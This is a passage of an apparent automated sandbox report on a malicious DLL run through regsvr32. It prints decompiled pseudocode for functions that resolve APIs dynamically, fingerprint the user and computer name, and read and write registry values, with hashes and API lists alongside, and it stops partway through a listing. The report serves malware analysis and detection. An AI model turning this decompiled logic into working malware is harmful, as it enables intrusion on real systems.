                    • Instruction ID: 0af29003c7d9b76d2454274978fd0c047cf43dbc516400dddc7d8d28cc654d13
                    • Opcode Fuzzy Hash: 4809fef1a9b0a03e8dd0fb0d3d568156c360a46d2640ebd14fe4e686f66fef0f
                    • Instruction Fuzzy Hash: 7431F9B6D00209BFFF22DFA5C88099EB7F8EB08354F10556EE551A2250D771AE499B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F94CA7 Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(00000000), ref: 04F94D03
                    • SysAllocString.OLEAUT32(0070006F), ref: 04F94D17
                    • SysAllocString.OLEAUT32(00000000), ref: 04F94D29
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94D8D
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94D9C
                    • SysFreeString.OLEAUT32(00000000), ref: 04F94DA7
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: fc13b2c7c41aa6c65b19cdbd322b08421b488df259955e17b5c69368879e4e82
                    • Instruction ID: 6e9caf46678625e64ca092efb511ddb9c7eb32e353b4141c5066210119b8c16b
                    • Opcode Fuzzy Hash: fc13b2c7c41aa6c65b19cdbd322b08421b488df259955e17b5c69368879e4e82
                    • Instruction Fuzzy Hash: 33313D36D00609BFEF01DFB8D844A9EB7F6AF49304F154465E910EB220DB75AD06CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9624F Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F9624F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04F963FD(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4f9a320; // 0xb2d5a8
					_t1 = _t23 + 0x4f9b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4f9a320; // 0xb2d5a8
					_t2 = _t26 + 0x4f9b769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04F917AB(_t54);
					} else {
						_t30 =  *0x4f9a320; // 0xb2d5a8
						_t5 = _t30 + 0x4f9b756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4f9a320; // 0xb2d5a8
							_t7 = _t33 + 0x4f9b40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4f9a320; // 0xb2d5a8
								_t9 = _t36 + 0x4f9b4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4f9a320; // 0xb2d5a8
									_t11 = _t39 + 0x4f9b779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04F9462B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                    0x04f9625e
                    0x04f96262
                    0x04f96324
                    0x04f96268
                    0x04f96268
                    0x04f9626d
                    0x04f96280
                    0x04f96282
                    0x04f96287
                    0x04f9628f
                    0x04f96296
                    0x04f9629a
                    0x04f9629d
                    0x04f9631c
                    0x04f9631d
                    0x04f9629f
                    0x04f9629f
                    0x04f962a4
                    0x04f962ac
                    0x04f962b0
                    0x04f962b3
                    0x00000000
                    0x04f962b5
                    0x04f962b5
                    0x04f962ba
                    0x04f962c2
                    0x04f962c6
                    0x04f962c9
                    0x00000000
                    0x04f962cb
                    0x04f962cb
                    0x04f962d0
                    0x04f962d8
                    0x04f962dc
                    0x04f962df
                    0x00000000
                    0x04f962e1
                    0x04f962e1
                    0x04f962e6
                    0x04f962ee
                    0x04f962f2
                    0x04f962f5
                    0x00000000
                    0x04f962f7
                    0x04f962fd
                    0x04f96302
                    0x04f96309
                    0x04f96310
                    0x04f96313
                    0x00000000
                    0x04f96315
                    0x04f96318
                    0x04f96318
                    0x04f96313
                    0x04f962f5
                    0x04f962df
                    0x04f962c9
                    0x04f962b3
                    0x04f9629d
                    0x04f96332

                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F91986,?,?,?,?,00000000,00000000), ref: 04F96274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F96296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F962AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F962C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F962D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F962EE
                      • Part of subcall function 04F9462B: memset.NTDLL ref: 04F946AA
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: ec7fa86c0b74e3002b79ae0ea8f10e9f5f80f67f8423d03343cb49768540f65c
                    • Instruction ID: 0d5c410cf355e2c504d6c25e1ab6804ce16db89a4008115e6152ef42ebce03f5
                    • Opcode Fuzzy Hash: ec7fa86c0b74e3002b79ae0ea8f10e9f5f80f67f8423d03343cb49768540f65c
                    • Instruction Fuzzy Hash: F6212CB1A0024AAFFB20DF69E884E5A77ECFB08744B054529E909C7301E779FD068B70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F92B1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E04F92B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4f9a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E04F95406( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E04F97488(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E04F917AB(_a8);
						goto L29;
					}
					_t64 =  *0x4f9a318; // 0x5ac9d58
					_t16 = _t64 + 0xc; // 0x5ac9e7a
					_t65 = E04F95406(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04f990
						if(E04F95B98(_t97,  *_t33, _t91, _a8,  *0x4f9a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x4f9a320; // 0xb2d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4f9ba3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4f9b8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04F9266A(_t69,  *0x4f9a3d4,  *0x4f9a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4f9a320; // 0xb2d5a8
									_t44 = _t71 + 0x4f9b846; // 0x74666f53
									_t73 = E04F95406(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04f990
										E04F934EE( *_t47, _t91, _a8,  *0x4f9a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d04f990
										E04F934EE( *_t49, _t91, _t99,  *0x4f9a3d0, _a16);
										E04F917AB(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04f990
									E04F934EE( *_t40, _t91, _a8,  *0x4f9a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d04f990
									E04F934EE( *_t43, _t91, _a8,  *0x4f9a3d0, _a16);
								}
								if( *_t101 != 0) {
									E04F917AB(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04f990
					_t81 = E04F91BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04f990
							E04F95B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04F917AB(_t100);
						_t98 = _a16;
					}
					E04F917AB(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04F97961(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4f9a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                    0x04f92b1e
                    0x04f92b27
                    0x04f92b2e
                    0x04f92b33
                    0x04f92ba0
                    0x04f92ba6
                    0x04f92bab
                    0x04f92bb2
                    0x04f92bb9
                    0x04f92bbc
                    0x04f92d27
                    0x04f92d2e
                    0x04f92d2e
                    0x04f92d33
                    0x04f92d35
                    0x04f92d35
                    0x04f92d3e
                    0x04f92d3e
                    0x04f92bc2
                    0x04f92bce
                    0x04f92d1d
                    0x04f92d20
                    0x00000000
                    0x04f92d20
                    0x04f92bd4
                    0x04f92bd9
                    0x04f92bdc
                    0x04f92be3
                    0x04f92be6
                    0x04f92c2f
                    0x04f92c2f
                    0x04f92c42
                    0x04f92c4c
                    0x04f92c54
                    0x04f92c59
                    0x04f92c63
                    0x04f92c63
                    0x04f92c5b
                    0x04f92c5b
                    0x04f92c5b
                    0x04f92c5b
                    0x04f92c85
                    0x04f92c8d
                    0x04f92cbb
                    0x04f92cc0
                    0x04f92cc7
                    0x04f92ccc
                    0x04f92cd0
                    0x04f92d02
                    0x04f92cd2
                    0x04f92cdf
                    0x04f92ce2
                    0x04f92cf2
                    0x04f92cf5
                    0x04f92cfb
                    0x04f92cfb
                    0x04f92c8f
                    0x04f92c9c
                    0x04f92c9f
                    0x04f92cb1
                    0x04f92cb4
                    0x04f92cb4
                    0x04f92d0c
                    0x04f92d18
                    0x04f92d0e
                    0x04f92d11
                    0x04f92d11
                    0x04f92d0c
                    0x04f92c85
                    0x00000000
                    0x04f92c4c
                    0x04f92bf5
                    0x04f92bf8
                    0x04f92bff
                    0x04f92c05
                    0x04f92c08
                    0x04f92c0a
                    0x04f92c16
                    0x04f92c19
                    0x04f92c19
                    0x04f92c1f
                    0x04f92c24
                    0x04f92c24
                    0x04f92c2a
                    0x00000000
                    0x04f92c2a
                    0x04f92b38
                    0x00000000
                    0x04f92b5f
                    0x04f92b5f
                    0x04f92b6b
                    0x04f92b7e
                    0x04f92b84
                    0x04f92b8c
                    0x00000000
                    0x04f92b8c

                    APIs
                    • StrChrA.SHLWAPI(04F91850,0000005F,00000000,00000000,00000104), ref: 04F92B51
                    • lstrcpy.KERNEL32(?,?), ref: 04F92B7E
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                      • Part of subcall function 04F934EE: lstrlenW.KERNEL32(?,?,?,04F92CE7,3D04F990,80000002,04F91850,04F95F20,74666F53,4D4C4B48,04F95F20,?,3D04F990,80000002,04F91850,?), ref: 04F93513
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04F92BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: e125e10dd1e4558b74f8cdaad68849cba4e70d449a273fcef980ec4328208586
                    • Instruction ID: 5d7c3c2f42f550aa698ec862158323c22608026218ee896b6b023853f8237b44
                    • Opcode Fuzzy Hash: e125e10dd1e4558b74f8cdaad68849cba4e70d449a273fcef980ec4328208586
                    • Instruction Fuzzy Hash: 2951493690020EFFFF229FA4EC40E9A37F9EB08314F158965F91596160DB36ED16AB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F94DFF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E04F94DFF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4f9a3cc; // 0x5ac95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4f9a3cc; // 0x5ac95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4f9a3cc; // 0x5ac95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4f9b81a) {
					HeapFree( *0x4f9a2d8, 0, _t10);
					_t7 =  *0x4f9a3cc; // 0x5ac95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                    0x04f94dff
                    0x04f94e08
                    0x04f94e18
                    0x04f94e18
                    0x04f94e1d
                    0x04f94e22
                    0x00000000
                    0x00000000
                    0x04f94e12
                    0x04f94e12
                    0x04f94e24
                    0x04f94e29
                    0x04f94e2d
                    0x04f94e40
                    0x04f94e46
                    0x04f94e46
                    0x04f94e4f
                    0x04f94e51
                    0x04f94e55
                    0x04f94e5b

                    APIs
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F94E08
                    • Sleep.KERNEL32(0000000A), ref: 04F94E12
                    • HeapFree.KERNEL32(00000000), ref: 04F94E40
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F94E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 2482aea0e22c0902fa24b213455ee20ff87721649a92cd685bc81dc11c391bc6
                    • Instruction ID: ca3e4ee74be8667b3ba097ba5d815d527e1439e4b6190ea7b69aa40b19bd4d88
                    • Opcode Fuzzy Hash: 2482aea0e22c0902fa24b213455ee20ff87721649a92cd685bc81dc11c391bc6
                    • Instruction Fuzzy Hash: 64F0DAB4B4414AAFFB189F65F949E1677F5EB58301B058009EC12D73A0CA7AEC02CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F94B71 Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F94B71() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E04F963FD(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E04F917AB(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                    0x04f94b7f
                    0x04f94b82
                    0x04f94b85
                    0x04f94b8b
                    0x04f94b90
                    0x04f94b96
                    0x04f94b9e
                    0x04f94ba1
                    0x04f94ba7
                    0x04f94bac
                    0x04f94bb9
                    0x04f94bc6
                    0x04f94bca
                    0x04f94bcc
                    0x04f94bd0
                    0x04f94bd3
                    0x04f94be3
                    0x04f94c35
                    0x04f94c36
                    0x04f94be5
                    0x04f94be8
                    0x04f94bef
                    0x04f94bf2
                    0x04f94c05
                    0x00000000
                    0x04f94c07
                    0x04f94c0a
                    0x04f94c1d
                    0x04f94c20
                    0x04f94c28
                    0x04f94c2b
                    0x00000000
                    0x04f94c2d
                    0x04f94c2d
                    0x04f94c30
                    0x04f94c30
                    0x04f94c2b
                    0x04f94c05
                    0x04f94c3b
                    0x04f94c3c
                    0x04f94bac
                    0x04f94c42

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F94B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04F94BA1
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F94BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04F94BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04F94C20
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: 66510738e62f9dbd7d6fab22767e25d86c7a1c6900baa2cb1139ff8dea65438e
                    • Instruction ID: fb522507fee9db31ede9621096189fad7a777af06e5dd229269becdf30f21c16
                    • Opcode Fuzzy Hash: 66510738e62f9dbd7d6fab22767e25d86c7a1c6900baa2cb1139ff8dea65438e
                    • Instruction Fuzzy Hash: 5121DAB1D00208FFDB11DFA9D984CAEBBF8EE54304B50456AE501E7200EA34AF46DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F95A5A Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F95A5A(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4f9a30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4f9a2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4f9a2f8 = _t6;
					 *0x4f9a304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4f9a2f4 = _t7;
					if(_t7 == 0) {
						 *0x4f9a2f4 =  *0x4f9a2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                    0x04f95a62
                    0x04f95a6a
                    0x04f95a6f
                    0x00000000
                    0x04f95ac4
                    0x04f95a71
                    0x04f95a79
                    0x04f95a81
                    0x04f95a81
                    0x04f95ac1
                    0x00000000
                    0x04f95ac1
                    0x04f95a83
                    0x04f95a83
                    0x04f95a88
                    0x04f95a9a
                    0x04f95a9f
                    0x04f95aa5
                    0x04f95aad
                    0x04f95ab2
                    0x04f95ab4
                    0x04f95ab4
                    0x00000000
                    0x04f95abb
                    0x04f95a7d
                    0x00000000
                    0x00000000
                    0x04f95a7f
                    0x00000000

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F94603,?), ref: 04F95A62
                    • GetVersion.KERNEL32 ref: 04F95A71
                    • GetCurrentProcessId.KERNEL32 ref: 04F95A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F95AA5
                    • GetLastError.KERNEL32 ref: 04F95AC4
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: 743301531035f939640e254e3f674af58efe43028512429b12767e6ab77f7636
                    • Instruction ID: 91c6650b88ab49eac4c8e64613ba424b1556e1fb0108977c128f795df8fbe6ed
                    • Opcode Fuzzy Hash: 743301531035f939640e254e3f674af58efe43028512429b12767e6ab77f7636
                    • Instruction Fuzzy Hash: B6F04FB1F82309BFEF259F35B949F143BA1E704751F014519E526CA2D0DAB95C42CB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93D67 Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E04F93D67(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x4f9a320; // 0xb2d5a8
					_t5 = _t102 + 0x4f9b038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x4f99290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x4f9a320; // 0xb2d5a8
												_t28 = _t108 + 0x4f9b0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x4f9a320; // 0xb2d5a8
														_t33 = _t78 + 0x4f9b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                    0x04f93d6c
                    0x04f93d75
                    0x04f93d76
                    0x04f93d7a
                    0x04f93d80
                    0x04f93d86
                    0x04f93d8f
                    0x04f93d95
                    0x04f93d9f
                    0x04f93da1
                    0x04f93da7
                    0x04f93dac
                    0x04f93db7
                    0x04f93dbf
                    0x04f93dc2
                    0x04f93ee5
                    0x04f93dc8
